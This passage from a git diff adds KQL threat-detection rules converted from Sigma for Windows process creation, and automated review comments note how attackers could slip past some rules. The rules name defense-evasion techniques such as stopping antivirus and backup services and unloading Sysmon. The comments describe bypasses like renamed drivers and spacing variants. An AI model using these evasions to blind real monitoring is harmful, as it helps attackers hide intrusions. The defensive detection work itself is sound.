"MSExchange" or ProcessCommandLine contains "msftesq1SPROO" or ProcessCommandLine contains 
"msftesql$PROD" or ProcessCommandLine contains "msftesql$SQLEXPRESS" or ProcessCommandLine contains "MSOLAP$SQL_2008" or ProcessCommandLine contains "MSOLAP$SYSTEM_BGC" or ProcessCommandLine contains "MSOLAP$TPS" or ProcessCommandLine contains "MSOLAP$TPSAMA" or ProcessCommandLine contains "MSOLAPSTPS" or ProcessCommandLine contains "MSOLAPSTPSAMA" or ProcessCommandLine contains "mssecflt" or ProcessCommandLine contains "MSSQ!I.SPROFXENGAGEMEHT" or ProcessCommandLine contains "MSSQ0SHAREPOINT" or ProcessCommandLine contains "MSSQ0SOPHOS" or ProcessCommandLine contains "MSSQL" or ProcessCommandLine contains "MSSQLFDLauncher$" or ProcessCommandLine contains "MySQL" or ProcessCommandLine contains "NanoServiceMain" or ProcessCommandLine contains "NetMsmqActivator" or ProcessCommandLine contains "NetPipeActivator" or ProcessCommandLine contains "netprofm" or ProcessCommandLine contains "NetTcpActivator" or ProcessCommandLine contains "NetTcpPortSharing" or ProcessCommandLine contains "ntrtscan" or ProcessCommandLine contains "nvspwmi" or ProcessCommandLine contains "ofcservice" or ProcessCommandLine contains "Online Protection System" or ProcessCommandLine contains "OracleClientCache80" or ProcessCommandLine contains "OracleDBConsole" or ProcessCommandLine contains "OracleMTSRecoveryService" or ProcessCommandLine contains "OracleOraDb11g_home1" or ProcessCommandLine contains "OracleService" or ProcessCommandLine contains "OracleVssWriter" or ProcessCommandLine contains "osppsvc" or ProcessCommandLine contains "PandaAetherAgent" or ProcessCommandLine contains "PccNTUpd" or ProcessCommandLine contains "PDVFSService" or ProcessCommandLine contains "POP3Svc" or ProcessCommandLine contains "postgresql-x64-9.4" or ProcessCommandLine contains "POVFSService" or ProcessCommandLine contains "PSUAService" or ProcessCommandLine contains "Quick Update Service" or ProcessCommandLine contains "RepairService" or ProcessCommandLine contains "ReportServer" or ProcessCommandLine contains 
"ReportServer$" or ProcessCommandLine contains "RESvc" or ProcessCommandLine contains "RpcEptMapper" or ProcessCommandLine contains "sacsvr" or ProcessCommandLine contains "SamSs" or ProcessCommandLine contains "SAVAdminService" or ProcessCommandLine contains "SAVService" or ProcessCommandLine contains "ScSecSvc" or ProcessCommandLine contains "SDRSVC" or ProcessCommandLine contains "SearchExchangeTracing" or ProcessCommandLine contains "sense" or ProcessCommandLine contains "SentinelAgent" or ProcessCommandLine contains "SentinelHelperService" or ProcessCommandLine contains "SepMasterService" or ProcessCommandLine contains "ShMonitor" or ProcessCommandLine contains "Smcinst" or ProcessCommandLine contains "SmcService" or ProcessCommandLine contains "SMTPSvc" or ProcessCommandLine contains "SNAC" or ProcessCommandLine contains "SntpService" or ProcessCommandLine contains "Sophos" or ProcessCommandLine contains "SQ1SafeOLRService" or ProcessCommandLine contains "SQL Backups" or ProcessCommandLine contains "SQL Server" or ProcessCommandLine contains "SQLAgent" or ProcessCommandLine contains "SQLANYs_Sage_FAS_Fixed_Assets" or ProcessCommandLine contains "SQLBrowser" or ProcessCommandLine contains "SQLsafe" or ProcessCommandLine contains "SQLSERVERAGENT" or ProcessCommandLine contains "SQLTELEMETRY" or ProcessCommandLine contains "SQLWriter" or ProcessCommandLine contains "SSISTELEMETRY130" or ProcessCommandLine contains "SstpSvc" or ProcessCommandLine contains "storflt" or ProcessCommandLine contains "svcGenericHost" or ProcessCommandLine contains "swc_service" or ProcessCommandLine contains "swi_filter" or ProcessCommandLine contains "swi_service" or ProcessCommandLine contains "swi_update" or ProcessCommandLine contains "Symantec" or ProcessCommandLine contains "sysmon" or ProcessCommandLine contains "TeamViewer" or ProcessCommandLine contains "Telemetryserver" or ProcessCommandLine contains "ThreatLockerService" or ProcessCommandLine contains "TMBMServer" or 
ProcessCommandLine contains "TmCCSF" or ProcessCommandLine contains "TmFilter" or ProcessCommandLine contains "TMiCRCScanService" or ProcessCommandLine contains "tmlisten" or ProcessCommandLine contains "TMLWCSService" or ProcessCommandLine contains "TmPfw" or ProcessCommandLine contains "TmPreFilter" or ProcessCommandLine contains "TmProxy" or ProcessCommandLine contains "TMSmartRelayService" or ProcessCommandLine contains "tmusa" or ProcessCommandLine contains "Tomcat" or ProcessCommandLine contains "Trend Micro Deep Security Manager" or ProcessCommandLine contains "TrueKey" or ProcessCommandLine contains "UFNet" or ProcessCommandLine contains "UI0Detect" or ProcessCommandLine contains "UniFi" or ProcessCommandLine contains "UTODetect" or ProcessCommandLine contains "vds" or ProcessCommandLine contains "Veeam" or ProcessCommandLine contains "VeeamDeploySvc" or ProcessCommandLine contains "Veritas System Recovery" or ProcessCommandLine contains "vmic" or ProcessCommandLine contains "VMTools" or ProcessCommandLine contains "vmvss" or ProcessCommandLine contains "VSApiNt" or ProcessCommandLine contains "VSS" or ProcessCommandLine contains "W3Svc" or ProcessCommandLine contains "wbengine" or ProcessCommandLine contains "WdNisSvc" or ProcessCommandLine contains "WeanClOudSve" or ProcessCommandLine contains "Weems JY" or ProcessCommandLine contains "WinDefend" or ProcessCommandLine contains "wmms" or ProcessCommandLine contains "wozyprobackup" or ProcessCommandLine contains "WPFFontCache_v0400" or ProcessCommandLine contains "WRSVC" or ProcessCommandLine contains "wsbexchange" or ProcessCommandLine contains "WSearch" or ProcessCommandLine contains "wscsvc" or ProcessCommandLine contains "Zoolz 2 Service") and ((ProcessCommandLine contains " delete " or ProcessCommandLine contains ".delete()" or ProcessCommandLine contains " pause " or ProcessCommandLine contains " stop " or ProcessCommandLine contains "Stop-Service " or ProcessCommandLine contains "Remove-Service ") or 
(ProcessCommandLine contains "config" and ProcessCommandLine contains "start=disabled")) and ((ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe", "PowerShell_ISE.EXE", "PowerShell.EXE", "psservice.exe", "pwsh.dll", "sc.exe", "wmic.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\PowerShell_ISE.EXE" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\PsService.exe" or FolderPath endswith "\\PsService64.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\wmic.exe")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql b/KQL/rules/windows/process_creation/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql new file mode 100644 index 00000000..b43493dc --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Windows Trace ETW Session Tamper Via Logman.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2021-02-11 +// Level: high +// Description: Detects the execution of "logman" utility in order to disable or delete Windows trace sessions +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001, attack.t1070.001 +// False Positives: +// - Legitimate deactivation by administrative staff +// - Installer tools that disable services, e.g. before log collection agent installation + +DeviceProcessEvents +| where (ProcessCommandLine contains "stop " or ProcessCommandLine contains "delete ") and (FolderPath endswith "\\logman.exe" or ProcessVersionInfoOriginalFileName =~ "Logman.exe") and (ProcessCommandLine contains "Circular Kernel Context Logger" or ProcessCommandLine contains "EventLog-" or ProcessCommandLine contains "SYSMON TRACE" or ProcessCommandLine contains "SysmonDnsEtwSession") \ No newline at end of file 
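Review bot: The `start=disabled` term at the end of the `| where` clause only matches a form that sc.exe rejects, because `sc config` requires a space after the equals sign (`start= disabled`), so the disable-via-config invocation that actually works is not caught. Adding the spaced variant closes the gap: `(ProcessCommandLine contains "config" and (ProcessCommandLine contains "start=disabled" or ProcessCommandLine contains "start= disabled"))`. Separately, several entries in the name list are very short substrings (`"vds"`, `"VSS"`, `"HMS"`, `"MMS"`, `"sense"`, `"BITS"`) and KQL `contains` is case-insensitive, so any `net stop`/`sc stop` whose argument merely embeds those letters fires; a word-bounded `has` for the short tokens would cut that noise. Both traits come from the upstream Sigma rule, so the fix belongs in the converter or a post-processing step rather than in this generated file.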
diff --git a/KQL/rules/windows/process_creation/suspicious_windows_update_agent_empty_cmdline.kql b/KQL/rules/windows/process_creation/suspicious_windows_update_agent_empty_cmdline.kql new file mode 100644 index 00000000..75bbb803 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_windows_update_agent_empty_cmdline.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Windows Update Agent Empty Cmdline +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-26 +// Level: high +// Description: Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents +| where (ProcessCommandLine endswith "Wuauclt" or ProcessCommandLine endswith "Wuauclt.exe") and (FolderPath endswith "\\Wuauclt.exe" or ProcessVersionInfoOriginalFileName =~ "Wuauclt.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_windowsterminal_child_processes.kql b/KQL/rules/windows/process_creation/suspicious_windowsterminal_child_processes.kql new file mode 100644 index 00000000..ebd0dfea --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_windowsterminal_child_processes.kql 
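Review bot: The `endswith "Wuauclt"` / `endswith "Wuauclt.exe"` tests on the `| where` line fail as soon as the image path is quoted or followed by trailing whitespace, so `"C:\Windows\System32\wuauclt.exe"` with no arguments, which is exactly the flag-less launch the description targets, is not matched. Normalising first preserves the intent: `| extend cmd = trim(@'[\s"]+', ProcessCommandLine)` followed by `(cmd endswith "wuauclt" or cmd endswith "wuauclt.exe")` in place of the two `ProcessCommandLine endswith` terms. The upstream Sigma rule uses the same `endswith` form, so this is a converter-level hardening rather than a divergence introduced by this file.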
@@ -0,0 +1,12 @@ +// Title: Suspicious WindowsTerminal Child Processes +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-25 +// Level: medium +// Description: Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence +// False Positives: +// - Other legitimate "Windows Terminal" profiles + +DeviceProcessEvents +| where ((InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe" or InitiatingProcessFolderPath endswith "\\wt.exe") and ((FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\csc.exe") or (FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Desktop\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Windows\\TEMP\\") or (ProcessCommandLine contains " iex " or ProcessCommandLine contains " icm" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo " or ProcessCommandLine contains "DownloadString(" or ProcessCommandLine contains " /c " or ProcessCommandLine contains " /k " or ProcessCommandLine contains " /r "))) and (not(((ProcessCommandLine contains "Import-Module" and ProcessCommandLine contains "Microsoft.VisualStudio.DevShell.dll" and ProcessCommandLine contains "Enter-VsDevShell") or (ProcessCommandLine contains "\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_" and ProcessCommandLine contains "\\LocalState\\settings.json") or (ProcessCommandLine contains "C:\\Program Files\\Microsoft Visual Studio\\" and ProcessCommandLine contains "\\Common7\\Tools\\VsDevCmd.bat")))) \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/suspicious_wmic_execution_via_office_process.kql b/KQL/rules/windows/process_creation/suspicious_wmic_execution_via_office_process.kql new file mode 100644 index 00000000..ccfee321 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_wmic_execution_via_office_process.kql @@ -0,0 +1,10 @@ +// Title: Suspicious WMIC Execution Via Office Process +// Author: Vadim Khrykov, Cyb3rEng +// Date: 2021-08-23 +// Level: high +// Description: Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin). +// MITRE Tactic: Execution +// Tags: attack.t1204.002, attack.t1047, attack.t1218.010, attack.execution, attack.defense-evasion + +DeviceProcessEvents +| where (InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" or InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and ((ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "msiexec" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "verclsid" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript") and (ProcessCommandLine contains "process" and ProcessCommandLine contains "create" and ProcessCommandLine contains "call")) and (FolderPath endswith "\\wbem\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/suspicious_wmiprvse_child_process.kql b/KQL/rules/windows/process_creation/suspicious_wmiprvse_child_process.kql new file mode 100644 index 00000000..b128404b --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_wmiprvse_child_process.kql @@ -0,0 +1,10 @@ +// Title: Suspicious WmiPrvSE Child Process +// Author: Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems) +// Date: 2021-08-23 +// Level: high +// Description: Detects suspicious and uncommon child processes of WmiPrvSE +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1047, attack.t1204.002, attack.t1218.010 + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\wbem\\WmiPrvSE.exe" and ((FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wscript.exe") or ((ProcessCommandLine contains "cscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript") and FolderPath endswith "\\cmd.exe")) and (not(((ProcessCommandLine contains "/i " and FolderPath endswith "\\msiexec.exe") or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WmiPrvSE.exe"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_workstation_locking_via_rundll32.kql b/KQL/rules/windows/process_creation/suspicious_workstation_locking_via_rundll32.kql new file mode 100644 index 00000000..7981e74c --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_workstation_locking_via_rundll32.kql 
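Review bot: PowerShell appears only in the cmd.exe branch of the `| where` clause (`ProcessCommandLine contains "powershell" ... and FolderPath endswith "\\cmd.exe"`), while the direct-child list holds certutil, cscript, mshta, msiexec, regsvr32, rundll32, verclsid and wscript, so `wmic process call create "powershell -enc ..."`, which makes powershell.exe a direct child of WmiPrvSE.exe, passes this rule. Unless a sibling rule in the converted set covers that case, adding `FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"` to the direct-child list is worth considering. The exclusion `not(... contains "/i " and FolderPath endswith "\\msiexec.exe")` also drops every remote MSI install performed through WMI, which a header comment should state explicitly so analysts know that gap is deliberate.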
@@ -0,0 +1,12 @@ +// Title: Suspicious Workstation Locking via Rundll32 +// Author: frack113 +// Date: 2022-06-04 +// Level: medium +// Description: Detects a suspicious call to the user32.dll function that locks the user workstation +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option + +DeviceProcessEvents +| where ProcessCommandLine contains "user32.dll," and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\cmd.exe" and ProcessCommandLine contains "LockWorkStation" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_x509enrollment_process_creation.kql b/KQL/rules/windows/process_creation/suspicious_x509enrollment_process_creation.kql new file mode 100644 index 00000000..f4de1526 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_x509enrollment_process_creation.kql @@ -0,0 +1,12 @@ +// Title: Suspicious X509Enrollment - Process Creation +// Author: frack113 +// Date: 2022-12-23 +// Level: medium +// Description: Detect use of X509Enrollment +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1553.004 +// False Positives: +// - Legitimate administrative script + +DeviceProcessEvents +| where ProcessCommandLine contains "X509Enrollment.CBinaryConverter" or ProcessCommandLine contains "884e2002-217d-11da-b2a4-000e7bbb2b09" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_xor_encoded_powershell_command.kql b/KQL/rules/windows/process_creation/suspicious_xor_encoded_powershell_command.kql new file mode 100644 index 00000000..c421d7f0 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_xor_encoded_powershell_command.kql 
@@ -0,0 +1,10 @@ +// Title: Suspicious XOR Encoded PowerShell Command +// Author: Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali +// Date: 2018-09-05 +// Level: medium +// Description: Detects presence of a potentially xor encoded powershell command +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1140, attack.t1027 + +DeviceProcessEvents +| where (ProcessCommandLine contains "ForEach" or ProcessCommandLine contains "for(" or ProcessCommandLine contains "for " or ProcessCommandLine contains "-join " or ProcessCommandLine contains "-join'" or ProcessCommandLine contains "-join\"" or ProcessCommandLine contains "-join`" or ProcessCommandLine contains "::Join" or ProcessCommandLine contains "[char]") and ProcessCommandLine contains "bxor" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or ProcessVersionInfoFileDescription =~ "Windows PowerShell" or ProcessVersionInfoProductName =~ "PowerShell Core 6") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_zipexec_execution.kql b/KQL/rules/windows/process_creation/suspicious_zipexec_execution.kql new file mode 100644 index 00000000..7b76e407 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_zipexec_execution.kql 
@@ -0,0 +1,10 @@ +// Title: Suspicious ZipExec Execution +// Author: frack113 +// Date: 2021-11-07 +// Level: medium +// Description: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/generic:Microsoft_Windows_Shell_ZipFolder:filename=" and ProcessCommandLine contains ".zip" and ProcessCommandLine contains "/pass:" and ProcessCommandLine contains "/user:") or (ProcessCommandLine contains "/delete" and ProcessCommandLine contains "Microsoft_Windows_Shell_ZipFolder:filename=" and ProcessCommandLine contains ".zip") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/syncappvpublishingserver_execute_arbitrary_powershell_code.kql b/KQL/rules/windows/process_creation/syncappvpublishingserver_execute_arbitrary_powershell_code.kql new file mode 100644 index 00000000..40ece80f --- /dev/null +++ b/KQL/rules/windows/process_creation/syncappvpublishingserver_execute_arbitrary_powershell_code.kql @@ -0,0 +1,12 @@ +// Title: SyncAppvPublishingServer Execute Arbitrary PowerShell Code +// Author: frack113 +// Date: 2021-07-12 +// Level: medium +// Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - App-V clients + +DeviceProcessEvents +| where ProcessCommandLine contains "\"n; " and (FolderPath endswith "\\SyncAppvPublishingServer.exe" or ProcessVersionInfoOriginalFileName =~ "syncappvpublishingserver.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql b/KQL/rules/windows/process_creation/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql new file mode 100644 index 00000000..2086b083 
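Review bot: The single command-line test `ProcessCommandLine contains "\"n; "` requires a space after the semicolon, so the form commonly shown for this LOLBin, `SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString(...)"` with no space, is not matched even though the `"n;` prefix is what carries the technique. A tolerant match keeps the intent: `ProcessCommandLine matches regex @'(?i)"n\s*;'`. The trailing space is present in the upstream Sigma literal as well, so the converter is faithful here; the looseness should be raised against the source rule or handled in a post-conversion step.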
--- /dev/null +++ b/KQL/rules/windows/process_creation/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql @@ -0,0 +1,10 @@ +// Title: SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code +// Author: frack113 +// Date: 2021-07-16 +// Level: medium +// Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.t1216 + +DeviceProcessEvents +| where ProcessCommandLine contains "\\SyncAppvPublishingServer.vbs" and ProcessCommandLine contains ";" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/sysinternals_psservice_execution.kql b/KQL/rules/windows/process_creation/sysinternals_psservice_execution.kql new file mode 100644 index 00000000..17ebc6de --- /dev/null +++ b/KQL/rules/windows/process_creation/sysinternals_psservice_execution.kql @@ -0,0 +1,12 @@ +// Title: Sysinternals PsService Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-16 +// Level: medium +// Description: Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.discovery, attack.persistence, attack.t1543.003 +// False Positives: +// - Legitimate use of PsService by an administrator + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "psservice.exe" or (FolderPath endswith "\\PsService.exe" or FolderPath endswith "\\PsService64.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/sysinternals_pssuspend_execution.kql b/KQL/rules/windows/process_creation/sysinternals_pssuspend_execution.kql new file mode 100644 index 00000000..f133c883 --- /dev/null +++ b/KQL/rules/windows/process_creation/sysinternals_pssuspend_execution.kql 
@@ -0,0 +1,10 @@ +// Title: Sysinternals PsSuspend Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-23 +// Level: medium +// Description: Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.discovery, attack.persistence, attack.t1543.003 + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "pssuspend.exe" or (FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/sysinternals_pssuspend_suspicious_execution.kql b/KQL/rules/windows/process_creation/sysinternals_pssuspend_suspicious_execution.kql new file mode 100644 index 00000000..6e39985e --- /dev/null +++ b/KQL/rules/windows/process_creation/sysinternals_pssuspend_suspicious_execution.kql @@ -0,0 +1,12 @@ +// Title: Sysinternals PsSuspend Suspicious Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-23 +// Level: high +// Description: Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "msmpeng.exe" and (ProcessVersionInfoOriginalFileName =~ "pssuspend.exe" or (FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/sysmon_configuration_update.kql b/KQL/rules/windows/process_creation/sysmon_configuration_update.kql new file mode 100644 index 00000000..d48c7077 --- /dev/null +++ b/KQL/rules/windows/process_creation/sysmon_configuration_update.kql 
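Review bot: The only selector on the `| where` line of the "Suspicious Execution" rule is `ProcessCommandLine contains "msmpeng.exe"`, but PsSuspend takes a process name or a PID, and if it accepts the bare image name as the other PsTools do, `pssuspend msmpeng` or `pssuspend 1234` slips past while still suspending Defender. Dropping the extension, `ProcessCommandLine contains "msmpeng"`, covers the first case for free; the PID case cannot be caught from the command line alone and deserves a note in the header. The description promises "AV or EDR" but only Defender's engine is listed, so either the description should be narrowed or the name list extended (for example `MsSense`) in the Sigma source.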
@@ -0,0 +1,12 @@ +// Title: Sysmon Configuration Update +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-09 +// Level: medium +// Description: Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate administrators might use this command to update Sysmon configuration. + +DeviceProcessEvents +| where (ProcessCommandLine contains "-c" or ProcessCommandLine contains "/c" or ProcessCommandLine contains "–c" or ProcessCommandLine contains "—c" or ProcessCommandLine contains "―c") and ((FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\Sysmon.exe") or ProcessVersionInfoFileDescription =~ "System activity monitor") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql b/KQL/rules/windows/process_creation/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql new file mode 100644 index 00000000..8b36d4fa --- /dev/null +++ b/KQL/rules/windows/process_creation/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql 
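Review bot: The `-c` / `/c` test on the `| where` line is an unanchored `contains`, so any argument that merely embeds those two characters matches: `sysmon64.exe -accepteula -i sysmon-config.xml` (an install, not an update) fires on the `-c` inside `sysmon-config`, and so does any path containing `/c`. Anchoring the switch to token boundaries keeps the dash variants the rule already enumerates: `ProcessCommandLine matches regex @'(?i)(^|\s)[-/–—―]c(\s|$)'`. A bare `sysmon -c` with no file argument only prints the current configuration, which is discovery rather than tampering and is worth listing under False Positives.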
@@ -0,0 +1,10 @@ +// Title: Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE +// Author: frack113 +// Date: 2021-12-16 +// Level: high +// Description: Detects usage of "findstr" with the argument "385201". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed). +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1518.001 + +DeviceProcessEvents +| where ProcessCommandLine contains " 385201" and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/sysmon_driver_unloaded_via_fltmc_exe.kql b/KQL/rules/windows/process_creation/sysmon_driver_unloaded_via_fltmc_exe.kql new file mode 100644 index 00000000..cbf2e305 --- /dev/null +++ b/KQL/rules/windows/process_creation/sysmon_driver_unloaded_via_fltmc_exe.kql @@ -0,0 +1,12 @@ +// Title: Sysmon Driver Unloaded Via Fltmc.EXE +// Author: Kirill Kiryanov, oscd.community +// Date: 2019-10-23 +// Level: high +// Description: Detects possible Sysmon filter driver unloaded via fltmc.exe +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070, attack.t1562, attack.t1562.002 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "unload" and ProcessCommandLine contains "sysmon") and (FolderPath endswith "\\fltMC.exe" or ProcessVersionInfoOriginalFileName =~ "fltMC.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/sysprep_on_appdata_folder.kql b/KQL/rules/windows/process_creation/sysprep_on_appdata_folder.kql new file mode 100644 index 00000000..a6d9a25b --- /dev/null +++ b/KQL/rules/windows/process_creation/sysprep_on_appdata_folder.kql 
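Review bot: The Fltmc rule's `| where` clause keys on `ProcessCommandLine contains "sysmon"`, which only catches the default driver name; the driver can be renamed at install time (Sysmon's `-d` switch), and the preceding rule in this same hunk line exists precisely because adversaries locate the renamed driver via altitude 385201 first, after which `fltmc unload <renamed>` passes this rule untouched. Because unloading any minifilter from fltmc is rare on a managed host, a companion selection without the name constraint, `ProcessCommandLine contains "unload" and (FolderPath endswith "\\fltMC.exe" or ProcessVersionInfoOriginalFileName =~ "fltMC.exe")` at a lower level, would close that evasion. As written the high level is fine, but the False Positives note should say the rule assumes the default driver name.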
@@ -0,0 +1,12 @@
+// Title: Sysprep on AppData Folder
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-06-22
+// Level: medium
+// Description: Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\AppData\\" and FolderPath endswith "\\sysprep.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/system_disk_and_volume_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/system_disk_and_volume_reconnaissance_via_wmic_exe.kql
new file mode 100644
